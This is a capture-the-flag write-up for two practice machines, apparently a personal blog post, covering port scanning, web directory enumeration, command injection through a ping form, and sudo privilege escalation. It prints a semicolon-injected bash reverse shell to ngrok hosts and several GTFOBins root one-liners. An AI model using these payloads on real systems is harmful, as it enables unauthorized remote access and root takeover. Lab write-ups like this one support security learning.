Cyberspace Vault Command Injection

Note: I'll diverse a little bit into the Injector machine on cybertalents
IP : 40.89.151.93

First Question: On what port is the webserver running

I struggled with this one for a while just coz i wasn't running nmap with -p- to look for all ports. Literally cost me first blood…lmao!
A friend of mine suggested i should use rustscan instead and that's what i ended up using. Never heard of rustscan before and you want to do a quick install on debian?

wget https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb

Then run sudo dpkg -i rustscan_2.0.1_amd64.deb to install.
Now that you have rustscan on your machine, you can scan for ports on the IP address given.
The basic syntax for rustscan that i used is:
rustscan -a <IP>

Alright. We have two ports…22 and 3060. We know that 22 is SSH, but what about 3060? A quick easy way to check this is using nc.
For 22, it was able to identify it as SSH but for the second port, it has no idea. Let's check it out!

Interesting…we get a webserver and we get the answer to that question.

Second question: What is flag1

Looking at the text box on the webserver, it says Enter Command here. That's intriguing. Can we run like ls?

Seems we can. Got two files, flag1.txt and index.php. Easy

Diversing into the Cybertalents Injector Machine
When doing a machine on cybertalents, normally you're given a VPN and how to connect to it, and the Public IP as well. But for me, the VPN never worked so i had to work with the public IP.
Public IP: 3.127.234.70

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9c:34:1a:fd:db:03:c5:81:05:b0:64:cf:70:ad:63:3e (RSA)
|   256 04:f2:79:9a:04:fd:0e:78:ac:df:12:50:55:4d:a2:c6 (ECDSA)
|_  256 a8:67:8f:0c:e9:b1:3d:53:b4:9d:fe:fd:93:af:e6:5b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Running nmap, got two ports, 22 and 80. Going over to the website…

We just get a default apache page. Time to do some enumeration i.e directory listing.

http://3.127.234.70/.htaccess (Status: 403)
http://3.127.234.70/.htpasswd (Status: 403)
http://3.127.234.70/.hta (Status: 403)
http://3.127.234.70/index.html (Status: 200)
http://3.127.234.70/secret (Status: 301)
http://3.127.234.70/server-status (Status: 403)

The only directory that sticks out is secret. Let's check it out.

Not helpful. Going to enumerate that directory this time.

http://3.127.234.70/secret/.htaccess (Status: 403)
http://3.127.234.70/secret/.hta (Status: 403)
http://3.127.234.70/secret/.htpasswd (Status: 403)
http://3.127.234.70/secret/company (Status: 301)
http://3.127.234.70/secret/index.html (Status: 200)
http://3.127.234.70/secret/robots.txt (Status: 200)
http://3.127.234.70/secret/root (Status: 301)
http://3.127.234.70/secret/test (Status: 301)
http://3.127.234.70/secret/tools (Status: 301)

The only useful directory here turned out to be /secret/tools. The private key is just a rabbit hole..lmao! There's a ping.php file though.

Looking at the page, it asks you for a domain or ip address to ping.

But when you try execute a command, it doesn't work.

So, bearing in mind the machine is called Injector, i thought, why not use both queries at the same time.

It works! We get a list of files. We have code execution. Question is, how are we supposed to get a reverse shell yet we aren't connected to the VPN?
The answer is ngrok believe it or not.
First i'll setup a ngrok tcp listener on port 9001.

sudo ngrok tcp 9001

In this case, our WAN IP becomes 4.tcp.ngrok.io and the port becomes 18489 and that's routable to our localhost and the port 9001. I'll start a listener on port 9001 and we can execute a reverse shell payload to get a shell. I'll use the classic:

bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'

Simple! Just ran 192.168.0.1; bash -c 'bash -i >& /dev/tcp/4.tcp.ngrok.io/18489 0>&1'. Now let's go back to cyberspace.

Third question: What operating system distribution is the webserver running on

You easily get the answer to this question by typing cat /etc/os-release | grep -iw "name"

Fourth question: What is the version of the operating system

Again, simple stuff. Just type cat /etc/os-release | grep -iw "version"

Fifth question: what user is the webserver running as

I really don't want to answer this..ROFL! Runid

Sixth question: who is the non-root user with a home directory

From here, i'd highly recommend you to have a shell just for easier navigation on the file system. And we know how to do this from what i demonstrated from Injector.
Easy stuff! In my case, i ran bash -c 'bash -i >& /dev/tcp/0.tcp.ngrok.io/14049 0>&1'
Looking at the home directory now…

Got two users, cmd with a UID of 1000 and tomato with a UID of 1001. Both are non-root users, but tomcat is recently created, hence went with that.

Seventh question: what is the SSH password of the above user

When you move into the root directory, you'll get a hint.txt file with a base64 encoding of the password.

Eighth question: what is the admin flag

We can now login as tomato using ssh. We no longer need the reverse shell at this point.

There are some interesting gtfobins. python, find and cat.
A gtfobin is basically a binary that can be used to bypass local privilege restrictions in misconfigured systems.
To find out how to exploit this, you can browse here: https://gtfobins.github.io/
We can exploit all three gtfobins. I'll use sudo just coz i don't want a reverse shell. I'll also use /bin/bash and not /bin/sh.

Python

sudo python -c 'import os; os.system("/bin/bash")'

Running this…

And we are root!
You can also spawn a tty shell with sudo to get root.

sudo python -c 'import pty; pty.spawn("/bin/bash")'

Find

sudo find . -exec /bin/bash \; -quit

Running this…

Cat

LFILE=file_to_read
sudo cat "$LFILE"

For this, it's a file read exploit. In this case, we can read the root flag.

Well, that was fun.